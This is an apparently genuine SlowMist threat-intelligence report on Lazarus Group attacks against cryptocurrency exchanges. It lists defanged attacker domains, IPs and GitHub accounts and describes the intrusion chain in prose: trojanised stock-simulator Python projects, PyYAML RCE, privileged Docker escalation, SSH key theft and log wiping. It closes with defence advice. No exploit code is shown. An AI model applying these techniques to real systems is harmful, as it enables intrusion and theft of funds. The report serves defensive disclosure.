Cryptocurrency APT Intelligence: Uncovering the Lazarus Group’s Intrusion Methods

Author: 23pds & Thinking; Source: SlowMist Technology

Background

Since June 2024, the SlowMist security team has received invitations from multiple teams to conduct forensic investigations on multiple hacker attacks. After the previous accumulation and in-depth analysis and investigation over the past 30 days, we have completed the review of hacker attack methods and intrusion paths. The results show that this is a national APT attack against cryptocurrency exchanges. Through forensic analysis and correlation tracking, we confirmed that the attacker is Lazarus Group.

After obtaining the relevant IOC (intrusion indicators) and TTP (tactics, techniques and procedures), we synchronized the intelligence to our partners as soon as possible. At the same time, we also found that other partners have also encountered the same attack methods and intrusion techniques. However, they were relatively lucky - the hackers triggered some security alerts during the intrusion process, and the attack was successfully blocked with the timely response of the security team.

In view of the recent APT attacks on cryptocurrency exchanges, the situation has become increasingly serious. After communicating with relevant parties, we decided to desensitize the IOC and TTP of the attack and publish it publicly so that community partners can defend and self-check in time. At the same time, due to the restrictions of the confidentiality agreement, we cannot disclose too much specific information of our partners. Next, we will focus on sharing the IOC and TTP of the attack.

Attacker Information

Attacker Domains:

• gossipsnare[.]com, 51.38.145.49:443

• showmanroast[.]com, 213.252.232.171:443

• getstockprice[.]info, 131.226.2.120:443

• eclairdomain[.]com, 37.120.247.180:443

• replaydreary[.]com, 88.119.175.208:443

• coreladao[.]com

• cdn.clubinfo[.]io

Attacker IP:

• 193.233.171[.]58

• 193.233.85[.]234

• 208.95.112[.]1

• 204.79.197[.]203

• 23.195.153[.]175

Attacker's GitHub username:

• https://github.com/mariaauijj

• https://github.com/patriciauiokv

• https://github.com/lauraengmp

Backdoor program name:

• StockInvestSimulator-main.zip

• MonteCarloStockInvestSimulator-main.zip

• Similar to …StockInvestSimulator-main.zip, etc.

Real project code:

 (https://github.com/cristianleoo/montecarlo-portfolio-management)

The fake project code after the attacker changed:

After comparison, it can be found that there is an additional data_fetcher.py file in the data directory, which contains a strange Loader:

Backdoor technology used by attackers

The attackers used pyyaml ​​for RCE (remote code execution) to send malicious code and control the target computer and server. This method bypasses the detection of most antivirus software. After synchronizing intelligence with partners, we obtained multiple similar malicious samples.

Key technical analysis reference: https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation#how-to-disable-the-warning

Through in-depth analysis of the samples, the SlowMist Security Team successfully reproduced the attacker's RCE (remote code execution) attack method using pyyaml.

Key Analysis of the Attack

Goal and Motivation

Goal: The attacker's main goal is to gain control of the wallet by invading the infrastructure of the cryptocurrency exchange, and then illegally transfer a large amount of crypto assets in the wallet.

Motivation: Trying to steal high-value cryptocurrency assets.

Technical Means

1. Initial Intrusion

• The attacker uses social engineering to trick employees into executing seemingly normal code on local devices or in Docker.

• During this investigation, we found that the malware used by the attackers included `StockInvestSimulator-main.zip` and `MonteCarloStockInvestSimulator-main.zip`. These files were disguised as legitimate Python projects, but they were actually remote control Trojans, and the attackers used pyyaml ​​for RCE as a means of sending and executing malicious code, bypassing the detection of most antivirus software.

2. Privilege escalation

• The attacker successfully obtained local control permissions on the employee's device through malware and tricked the employee into setting privileged in docker-compose.yaml to true.

• The attacker further escalated permissions by taking advantage of the condition that privileged was set to true, thereby fully controlling the target device.

3. Internal reconnaissance and lateral movement

• The attacker used the compromised employee computer to scan the intranet.

• The attacker then exploited the intranet’s service and application vulnerabilities to further invade the company’s internal servers.

• The attacker stole the SSH keys of key servers and used the whitelist trust relationship between servers to achieve lateral movement to the wallet server.

4. Crypto asset transfer

• After the attacker successfully gained control of the wallet, he illegally transferred a large amount of crypto assets to the wallet address he controlled.

5. Hiding traces

• Attackers use legitimate enterprise tools, application services, and infrastructure as a springboard to cover up the true source of their illegal activities, and delete or destroy log data and sample data.

Process

Attackers use social engineering to lure targets. Common methods include:

1. Disguised as a project party, looking for key target developers, requesting help debugging the code, and expressing willingness to pay in advance to gain trust.

After tracking the relevant IP and ua information, we found that this transaction was a third-party payment and did not have much value.

2. The attacker disguised himself as an automated trader or investor, provided trading analysis or quantitative code, and tricked key targets into executing malicious programs. Once the malicious program runs on the device, it will establish a persistent backdoor and provide remote access to the attacker.

• The attacker uses the hacked device to scan the intranet, identify key servers, and exploit vulnerabilities in corporate applications to further penetrate the corporate network. All attacks are carried out through the VPN traffic of the hacked device, thereby bypassing the detection of most security devices.

• Once the attacker successfully obtains the permissions of the relevant application servers, he will steal the SSH keys of the key servers, use the permissions of these servers to move horizontally, and finally control the wallet server and transfer the encrypted assets to the external address. Throughout the process, the attacker cleverly uses the internal tools and infrastructure of the enterprise to make the attack difficult to detect quickly.

• The attacker will trick employees into deleting the debugging and running programs and provide debugging rewards to cover up the traces of the attack.

In addition, because some deceived employees are worried about issues such as accountability, they may take the initiative to delete relevant information, resulting in the failure to report the relevant situation in a timely manner after the attack occurs, making investigation and evidence collection more difficult.

Response Suggestions

APT (Advanced Persistent Threat) attacks are extremely difficult to defend against due to their strong concealment, clear targets and long-term latent characteristics. Traditional security measures often find it difficult to detect their complex intrusion behaviors. Therefore, it is necessary to combine multi-level network security solutions, such as real-time monitoring, abnormal traffic analysis, endpoint protection and centralized log management, to detect and perceive the attacker's intrusion traces as early as possible, so as to effectively respond to threats. The SlowMist Security Team has proposed 8 major defense directions and suggestions, hoping to provide a reference for defense deployment for community partners:

1. Network Proxy Security Configuration

Goal:Configure security policies on network proxies to achieve security decision-making and service management based on the zero trust model.  

Solutions:Fortinet (https://www.fortinet.com/), Akamai (https://www.akamai.com/glossary/where-to-start-with-zero-trust), Cloudflare (https://www.cloudflare.com/zero-trust/products/access/), etc.

2. DNS Traffic Security Protection

Objective:Implement security controls at the DNS layer to detect and block requests to resolve known malicious domain names, and prevent DNS spoofing or data leakage.  

Solutions:Cisco Umbrella (https://umbrella.cisco.com/), etc.

3. Network traffic/host monitoring and threat detection

Objective:Analyze the data flow of network requests, monitor abnormal behaviors in real time, identify potential attacks (such as IDS/IPS), and install HIDS on the server to detect attackers' vulnerability exploits and other attack behaviors as early as possible.  

Solutions:SolarWinds Network Performance Monitor (https://www.solarwinds.com/), Palo Alto (https://www.paloaltonetworks.com/), Fortinet (https://www.fortinet.com/), Alibaba Cloud Security Center (https://www.alibabacloud.com/zh/product/security_center), GlassWire (https://www.glasswire.com/), etc.

4. Network segmentation and isolation

Goal:Divide the network into smaller, isolated areas to limit the scope of threat propagation and enhance security control capabilities.  

Solution:Cisco Identity Services Engine (https://www.cisco.com/site/us/en/products/security/identity-services-engine/index.html), cloud platform security group policy, etc.

5. System reinforcement measures

Goal:Implement security reinforcement strategies (such as configuration management, vulnerability scanning, and patch updates) to reduce system vulnerabilities and enhance defense capabilities.  

Solutions:Tenable.com (https://www.tenable.com/), public.cyber.mil (https://public.cyber.mil), etc.

6. Endpoint Visibility and Threat Detection

Goal:Provide real-time monitoring of terminal device activities, identify potential threats, support rapid response (such as EDR), set up an application whitelist mechanism, detect abnormal programs and issue timely alarms.

Solutions: CrowdStrike Falcon (https://www.crowdstrike.com/), Microsoft Defender for Endpoint (https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint), Jamf (https://www.jamf.com/) or WDAC (https://learn.microsoft.com/en-us/hololens/windows-defender-application-control-wdac), etc.

7. Centralized log management and analysis

Goal: Integrate log data from different systems into a unified platform to facilitate tracking, analysis and response to security incidents.

Solutions: Splunk Enterprise Security (https://www.splunk.com/), Graylog (https://graylog.org/), ELK (Elasticsearch, Logstash, Kibana), etc.

8. Cultivate team security awareness

Goal: Improve the security awareness of organizational members, be able to identify most social engineering attacks, and actively report anomalies after an incident so that they can be investigated more promptly.

Solutions:Blockchain Dark Forest Self-help Manual (https://darkhandbook.io/), Web3 Phishing Technique Analysis (https://github.com/slowmist/Knowledge-Base/blob/master/security-research/Web3%20%E9%92%93%E9%B1%BC%E6%89%8B%E6%B3%95%E8%A7%A3%E6%9E%90.pdf), etc.

In addition, we recommend periodic red-blue confrontation drills to identify weaknesses in security process management and security defense deployment.

Written at the end

Attacks often occur on weekends and traditional holidays, which poses a considerable challenge to incident response and resource coordination. During this process, 23pds (Shan Ge), Thinking, Reborn and other relevant members of the SlowMist Security Team remained vigilant, took turns to respond to emergencies during the holidays, and continued to advance the investigation and analysis. In the end, we successfully restored the attacker's methods and intrusion paths.

Looking back on this investigation, we not only revealed the attack methods of the Lazarus Group, but also analyzed its use of social engineering, vulnerability exploitation, privilege escalation, intranet penetration and fund transfer. At the same time, we summarized the defense recommendations for APT attacks based on actual cases, hoping to provide a reference for the industry, help more institutions improve their security protection capabilities, and reduce the impact of potential threats. Cybersecurity confrontation is a protracted battle, and we will continue to pay attention to similar attacks and help the community resist threats together.